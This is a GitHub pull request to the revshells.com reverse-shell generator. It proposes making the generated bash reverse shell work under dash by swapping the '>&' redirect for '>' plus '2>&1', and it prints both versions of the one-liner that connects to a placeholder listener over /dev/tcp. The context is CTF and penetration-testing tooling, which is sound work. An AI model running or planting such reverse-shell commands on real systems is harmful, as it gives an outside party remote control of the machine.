Skip to content

Replace '>&' fd redirect shortcut by POSIX-compliant '>' + '2>&1' to be compatible with shells like dash - #214

Open
Daniel-The-Fox wants to merge 1 commit into
0dayCTF:mainfrom
Daniel-The-Fox:main
Open

Replace '>&' fd redirect shortcut by POSIX-compliant '>' + '2>&1' to be compatible with shells like dash#214
Daniel-The-Fox wants to merge 1 commit into
0dayCTF:mainfrom
Daniel-The-Fox:main

Conversation

@Daniel-The-Fox

Copy link
Copy Markdown

Hi there, 👋🏻

I'm hooked by THM since a couple of months and I'm currently working on the THM Hacker Holidays 2026. While solving one of the earlier rooms, I came across revshells.com and I love it! Great job! 👍🏻

Today, I noticed a drawback of the reverse bash shells generated, if used on a Ubuntu with default shell set to dash.

Executing the proposed command

bash -i >& /dev/tcp/<LISTENER_IP>/<PORT> 0>&1

in dash will result in the error:

/bin/sh: 1: Syntax error: Bad fd number

To solve this, one has to replace the fd redirect shortcut >& by the POSIX-compliant > + 2>&1:

bash -i > /dev/tcp/<LISTENER_IP>/<PORT> 0>&1 2>&1

This is exactly what this PR proposes to change in data.js.
It's a couple of chars more, but then the command works out of the box per copy &paste in dash-based systems. 😎

…'>' + '2>&1' to be compatible with shells like dash
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant